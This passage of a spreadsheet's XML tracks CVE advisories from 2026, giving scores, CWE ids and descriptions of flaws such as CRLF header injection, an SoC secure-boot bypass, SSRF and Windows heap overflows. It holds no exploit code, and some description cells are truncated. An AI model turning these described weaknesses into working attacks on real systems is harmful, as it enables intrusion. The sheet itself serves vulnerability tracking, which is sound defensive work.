          <t>ePA 3.x Integration implements the authorization workflow and writes Medical Information Objects to Germany's electronic patient record. Prior to 1.3.0, ePA 3.x Integration does not neutralize CRLF characters in values used by app/vau/VAUProtokoll.py to construct VAU inner HTTP requests. The build_inner_header function interpolates the uri, host, accept_type, content_type, content_length, USER_AGENT, and insurant_id values into request lines and headers, including x-useragent and x-insurantid. An authenticated attacker who controls a value can inject additional headers into the inner request. Depending on ePA server handling, an injected x-insurantid header can expose another patient's records, and injected Authorization headers can bypass the intended authentication or authorization context. Session-derived USER_AGENT input can also poison requests across the session. This issue is fixed in version 1.3.0.</t>
        </is>
      </c>
      <c r="M3716" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50576</t>
        </is>
      </c>
    </row>
    <row r="3717">
      <c r="A3717" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3717" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50719</t>
        </is>
      </c>
      <c r="C3717" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D3717" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3717" s="5" t="inlineStr"/>
      <c r="F3717" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3717" s="5" t="inlineStr"/>
      <c r="H3717" s="5" t="inlineStr"/>
      <c r="I3717" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J3717" s="5" t="inlineStr"/>
      <c r="K3717" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-347, CWE-474</t>
        </is>
      </c>
      <c r="L3717" s="5" t="inlineStr">
        <is>
          <t>The Ingenic T41, and probably also T32, T40, and A1 SoC boot ROMs parse and execute an attacker-controlled init table from the SPL header before checking the secure boot state and before invoking signature verification. The init table parser supports full-address 32-bit write operations, allowing modification of SRAM-resident secure boot state prior to the verification decision. An attacker with physical write access to boot media can inject an init-table entry that disables the secure boot check, causing the ROM to accept unsigned or modified first-stage boot code. This has been hardware-validated on a secureboot-enabled T41 device; ROM analysis confirms closely related behavior on T32, T40, and A1.</t>
        </is>
      </c>
      <c r="M3717" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50719</t>
        </is>
      </c>
    </row>
    <row r="3718">
      <c r="A3718" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3718" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52097</t>
        </is>
      </c>
      <c r="C3718" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D3718" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3718" s="5" t="inlineStr"/>
      <c r="F3718" s="5" t="inlineStr"/>
      <c r="G3718" s="5" t="inlineStr"/>
      <c r="H3718" s="5" t="inlineStr"/>
      <c r="I3718" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3718" s="5" t="inlineStr"/>
      <c r="K3718" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L3718" s="5" t="inlineStr">
        <is>
          <t>An issue in AppFlowy 0.11.8 allows a remote attacker to execute arbitrary code via the afLaunchUri, _afLaunchLocalUri (url_launcher.dart), OpenFilex.open, localPathRegex (common_patterns.dart) components</t>
        </is>
      </c>
      <c r="M3718" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52097</t>
        </is>
      </c>
    </row>
    <row r="3719">
      <c r="A3719" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3719" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53196</t>
        </is>
      </c>
      <c r="C3719" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D3719" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3719" s="5" t="inlineStr"/>
      <c r="F3719" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3719" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H3719" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I3719" s="5" t="inlineStr">
        <is>
          <t>2026-06-25</t>
        </is>
      </c>
      <c r="J3719" s="5" t="inlineStr"/>
      <c r="K3719" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L3719" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
USB: serial: io_ti: fix heap overflow in get_manuf_info()
get_manuf_info() reads le16_to_cpu(rom_desc-&gt;Size) bytes from the
device I2C EEPROM into a buffer allocated with kmalloc_obj(), which
is sizeof(struct edge_ti_manuf_descriptor) = 10 bytes.
The Size field comes from the device and is only validated (in
check_i2c_image()) to make sure the descriptor fits within
TI_MAX_I2C_SIZE (16384 bytes), not against the destination buffer size.
A malicious USB device can therefore set Size to any value up to 16377,
causing a heap overflow of up to 16367 bytes when plugged into a host
running this driver.
valid_csum() is called after read_rom() and also iterates
buffer[0..Size-1], compounding the out-of-bounds access.
Fix by rejecting descriptors with unexpected length before calling
read_rom().
[ johan: amend commit message; also check for short descriptors ]</t>
        </is>
      </c>
      <c r="M3719" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53196</t>
        </is>
      </c>
    </row>
    <row r="3720">
      <c r="A3720" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3720" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55088</t>
        </is>
      </c>
      <c r="C3720" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D3720" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3720" s="5" t="inlineStr"/>
      <c r="F3720" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3720" s="5" t="inlineStr"/>
      <c r="H3720" s="5" t="inlineStr"/>
      <c r="I3720" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J3720" s="5" t="inlineStr"/>
      <c r="K3720" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-294</t>
        </is>
      </c>
      <c r="L3720" s="5" t="inlineStr">
        <is>
          <t>Etherpad is a real-time collaborative editor. From 2.6.0 until 3.1.0, Etherpad's src/node/hooks/express/tokenTransfer.ts uses POST /tokenTransfer to store an author token for transfer between browsers and exposes it through GET /tokenTransfer/{uuid}. Although the record includes createdAt, the transfer has no expiration check, is not removed after successful redemption, and is returned by res.send(tokenData), including the raw author token. An unauthenticated attacker who obtains a transfer UUID can repeatedly redeem it, receive fresh author cookies, read the cleartext token, and impersonate the originating author for pad read and write operations. This issue is fixed in version 3.1.0.</t>
        </is>
      </c>
      <c r="M3720" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55088</t>
        </is>
      </c>
    </row>
    <row r="3721">
      <c r="A3721" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3721" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55421</t>
        </is>
      </c>
      <c r="C3721" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D3721" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3721" s="5" t="inlineStr"/>
      <c r="F3721" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3721" s="5" t="inlineStr"/>
      <c r="H3721" s="5" t="inlineStr"/>
      <c r="I3721" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J3721" s="5" t="inlineStr"/>
      <c r="K3721" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L3721" s="5" t="inlineStr">
        <is>
          <t>Open edX Platform enables the authoring and delivery of online learning at any scale. Prior to commit 00b7c3c, the endpoint accepts user-supplied files[].url, performs a server-side fetch using "requests.get(url, allow_redirects=True)". The fetched bytes are then returned inside a ZIP response. This enables SSRF with response exfiltration. Redirect-following is enabled, and there is no timeout in the vulnerable fetch path. This issue has been patched via commit 00b7c3c.</t>
        </is>
      </c>
      <c r="M3721" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55421</t>
        </is>
      </c>
    </row>
    <row r="3722">
      <c r="A3722" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3722" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55535</t>
        </is>
      </c>
      <c r="C3722" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D3722" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3722" s="5" t="inlineStr"/>
      <c r="F3722" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3722" s="5" t="inlineStr"/>
      <c r="H3722" s="5" t="inlineStr"/>
      <c r="I3722" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J3722" s="5" t="inlineStr"/>
      <c r="K3722" s="5" t="inlineStr">
        <is>
          <t>CWE-367, CWE-918</t>
        </is>
      </c>
      <c r="L3722" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. Prior to praisonai 4.6.58, the Jobs API validate_webhook_url() path fails open on socket.gaierror and does not bind the validated address to the later request. An attacker webhook_url can later resolve to 127.0.0.1, 169.254.169.254, or another internal address. This issue is fixed in version 4.6.58.</t>
        </is>
      </c>
      <c r="M3722" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55535</t>
        </is>
      </c>
    </row>
    <row r="3723">
      <c r="A3723" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3723" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61608</t>
        </is>
      </c>
      <c r="C3723" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D3723" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3723" s="5" t="inlineStr"/>
      <c r="F3723" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3723" s="5" t="inlineStr"/>
      <c r="H3723" s="5" t="inlineStr"/>
      <c r="I3723" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3723" s="5" t="inlineStr"/>
      <c r="K3723" s="5" t="inlineStr">
        <is>
          <t>CWE-613</t>
        </is>
      </c>
      <c r="L3723" s="5" t="inlineStr">
        <is>
          <t>SolidInvoice is an open-source invoicing platform. Prior to version 3.0.1, `UserInvitation` entities have no expiry timestamp. Invitation links mailed to users remain valid indefinitely, meaning a leaked, forwarded, or archived invitation email can be used at any time in the future to join a company or silently add a compromised email account to a company. Version 3.0.1 fixes the issue.</t>
        </is>
      </c>
      <c r="M3723" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61608</t>
        </is>
      </c>
    </row>
    <row r="3724">
      <c r="A3724" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3724" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65812</t>
        </is>
      </c>
      <c r="C3724" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D3724" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3724" s="5" t="inlineStr"/>
      <c r="F3724" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G3724" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H3724" s="5" t="inlineStr"/>
      <c r="I3724" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3724" s="5" t="inlineStr"/>
      <c r="K3724" s="5" t="inlineStr">
        <is>
          <t>CWE-201</t>
        </is>
      </c>
      <c r="L3724" s="5" t="inlineStr">
        <is>
          <t>Insertion of sensitive information into sent data in Microsoft Teams for Android allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M3724" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65812</t>
        </is>
      </c>
    </row>
    <row r="3725">
      <c r="A3725" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3725" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67352</t>
        </is>
      </c>
      <c r="C3725" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D3725" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3725" s="5" t="inlineStr"/>
      <c r="F3725" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3725" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H3725" s="5" t="inlineStr"/>
      <c r="I3725" s="5" t="inlineStr">
        <is>
          <t>2026-08-01</t>
        </is>
      </c>
      <c r="J3725" s="5" t="inlineStr"/>
      <c r="K3725" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3725" s="5" t="inlineStr">
        <is>
          <t>luci-app-h</t>
        </is>
      </c>
      <c r="M3725" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67352</t>
        </is>
      </c>
    </row>
    <row r="3726">
      <c r="A3726" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3726" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68833</t>
        </is>
      </c>
      <c r="C3726" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D3726" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3726" s="5" t="inlineStr"/>
      <c r="F3726" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3726" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3726" s="5" t="inlineStr"/>
      <c r="I3726" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3726" s="5" t="inlineStr"/>
      <c r="K3726" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L3726" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="M3726" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68833</t>
        </is>
      </c>
    </row>
    <row r="3727">
      <c r="A3727" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3727" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69415</t>
        </is>
      </c>
      <c r="C3727" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D3727" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3727" s="5" t="inlineStr"/>
      <c r="F3727" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G3727" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H3727" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I3727" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3727" s="5" t="inlineStr"/>
      <c r="K3727" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L3727" s="5" t="inlineStr">
        <is>
          <t>Missing authentication for critical function in Windows DHCP Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M3727" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69415</t>
        </is>
      </c>
    </row>
    <row r="3728">
      <c r="A3728" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3728" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69490</t>
        </is>
      </c>
      <c r="C3728" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D3728" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3728" s="5" t="inlineStr"/>
      <c r="F3728" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3728" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3728" s="5" t="inlineStr"/>
      <c r="I3728" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3728" s="5" t="inlineStr"/>
      <c r="K3728" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L3728" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows USB Mass Storage Class Driver allows an unauthorized attacker to elevate privileges with a physical attack.</t>
        </is>
      </c>
      <c r="M3728" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69490</t>
        </is>
      </c>
    </row>
    <row r="3729">
      <c r="A3729" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3729" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69566</t>
        </is>
      </c>
      <c r="C3729" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D3729" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3729" s="5" t="inlineStr"/>
      <c r="F3729" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3729" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3729" s="5" t="inlineStr"/>
      <c r="I3729" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3729" s="5" t="inlineStr"/>
      <c r="K3729" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L3729" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="M3729" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69566</t>
        </is>
      </c>
    </row>
    <row r="3730">
      <c r="A3730" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3730" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71194</t>
        </is>
      </c>
      <c r="C3730" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D3730" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3730" s="5" t="inlineStr"/>
      <c r="F3730" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3730" s="5" t="inlineStr"/>
      <c r="H3730" s="5" t="inlineStr"/>
      <c r="I3730" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J3730" s="5" t="inlineStr"/>
      <c r="K3730" s="5" t="inlineStr">
        <is>
          <t>CWE-669</t>
        </is>
      </c>
      <c r="L3730" s="5" t="inlineStr">
        <is>
          <t>In OpenStack Designate before 22.0.2, the mDNS handler performs pool-blind lookups when resolving record queries and NOTIFY requests. When two zones with the same name exist across different pools, the lookup fails with a deterministic error, causing the handler to return REFUSED for all DNS queries through that path. The _handle_notify path is exploitable via a single unauthenticated UDP packet. This is independently reachable through the cross-tenant zone overlap described in a different recent CVE, and also affects legitimate same-tenant cross-pool configurations. BIND9 views do not mitigate this issue as mDNS is a shared service upstream of any view configuration.</t>
        </is>
      </c>
      <c r="M3730" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71194</t>
        </is>
      </c>
    </row>
    <row r="3731">
      <c r="A3731" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3731" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71329</t>
        </is>
      </c>
      <c r="C3731" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D3731" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3731" s="5" t="inlineStr"/>
      <c r="F3731" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3731" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3731" s="5" t="inlineStr"/>
      <c r="I3731" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3731" s="5" t="inlineStr"/>
      <c r="K3731" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L3731" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="M3731" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71329</t>
        </is>
      </c>
    </row>
    <row r="3732">
      <c r="A3732" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3732" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71348</t>
        </is>
      </c>
      <c r="C3732" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D3732" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3732" s="5" t="inlineStr"/>
      <c r="F3732" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3732" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3732" s="5" t="inlineStr"/>
      <c r="I3732" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3732" s="5" t="inlineStr"/>
      <c r="K3732" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L3732" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Spaceport.sys allows an unauthorized attacker to execute code with a physical attack.</t>
        </is>
      </c>
      <c r="M3732" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71348</t>
        </is>
      </c>
    </row>
    <row r="3733">
      <c r="A3733" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3733" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71349</t>
        </is>
      </c>
      <c r="C3733" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D3733" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3733" s="5" t="inlineStr"/>
      <c r="F3733" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3733" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3733" s="5" t="inlineStr"/>
      <c r="I3733" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3733" s="5" t="inlineStr"/>
      <c r="K3733" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L3733" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Spaceport.sys allows an unauthorized attacker to execute code with a physical attack.</t>
        </is>
      </c>
      <c r="M3733" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71349</t>
        </is>
      </c>
    </row>
    <row r="3734">
      <c r="A3734" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3734" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71350</t>
        </is>
      </c>
      <c r="C3734" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D3734" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3734" s="5" t="inlineStr"/>
      <c r="F3734" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3734" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3734" s="5" t="inlineStr"/>
      <c r="I3734" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3734" s="5" t="inlineStr"/>
      <c r="K3734" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L3734" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Spaceport.sys allows an unauthorized attacker to execute code with a physical attack.</t>
        </is>
      </c>
      <c r="M3734" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71350</t>
        </is>
      </c>
    </row>
    <row r="3735">
      <c r="A3735" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3735" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72703</t>
        </is>
      </c>
      <c r="C3735" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D3735" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3735" s="5" t="inlineStr"/>
      <c r="F3735" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3735" s="5" t="inlineStr"/>
      <c r="H3735" s="5" t="inlineStr"/>
      <c r="I3735" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J3735" s="5" t="inlineStr"/>
      <c r="K3735" s="5" t="inlineStr">
        <is>
          <t>CWE-670</t>
        </is>
      </c>
      <c r="L3735" s="5" t="inlineStr">
        <is>
          <t>The guard checker in Rocq Prover treats a parameter of a nested mutual fixpoint as uniform without examining calls between the different bodies of that fixpoint. find_uniform_parameters in kernel/inductive.ml inspects only self-recursive calls, so when no body calls itself the function concludes that every parameter is uniform. A parameter that grows through a cross-call from one body to another therefore keeps the subterm specification it inherited from the enclosing fixpoint, and a recursive call guarded by that specification is accepted although the argument is not structurally smaller. A non-terminating definition is admitted as structurally decreasing, which yields a term whose value equals its own successor and so a proof of False, from which any proposition follows. The proof requires no axioms, plugins or unsafe flags and Print Assumptions reports it as closed under the global context. Introduced in Coq 8.20 and fixed in Rocq 9.2.0.</t>
        </is>
      </c>
      <c r="M3735" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72703</t>
        </is>
      </c>
    </row>
    <row r="3736">
      <c r="A3736" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3736" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72704</t>
        </is>
      </c>
      <c r="C3736" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D3736" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3736" s="5" t="inlineStr"/>
      <c r="F3736" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3736" s="5" t="inlineStr"/>
      <c r="H3736" s="5" t="inlineStr"/>
      <c r="I3736" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J3736" s="5" t="inlineStr"/>
      <c r="K3736" s="5" t="inlineStr">
        <is>
          <t>CWE-670</t>
        </is>
      </c>
      <c r="L3736" s="5" t="inlineStr">
        <is>
          <t>The guard checker in Rocq Prover does not recheck the recursive tree representation of an inductive type parameter after that parameter has been changed by transport. A fixpoint may apply a rewrite along an equality between types to its recursive argument, which the guard checker accepts because the inductive type is preserved, while the recursive tree recorded for the parameter is altered. A second fixpoint that calls the first inherits the altered recursive tree without verification, so a call that is not structurally decreasing is accepted as terminating. The resulting non-terminating definition proves that a natural number equals its own successor and therefore False, from which any proposition follows. The demonstration uses two axioms that follow from univalence and are consistent with the calculus of inductive constructions, so the contradiction comes from the guard check rather than from the assumptions. A fix is proposed but not merged.</t>
        </is>
      </c>
      <c r="M3736" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72704</t>
        </is>
      </c>
    </row>
    <row r="3737">
      <c r="A3737" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3737" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72705</t>
        </is>
      </c>
      <c r="C3737" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D3737" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3737" s="5" t="inlineStr"/>
      <c r="F3737" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3737" s="5" t="inlineStr"/>
      <c r="H3737" s="5" t="inlineStr"/>
      <c r="I3737" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J3737" s="5" t="inlineStr"/>
      <c r="K3737" s="5" t="inlineStr">
        <is>
          <t>CWE-670</t>
        </is>
      </c>
      <c r="L3737" s="5" t="inlineStr">
        <is>
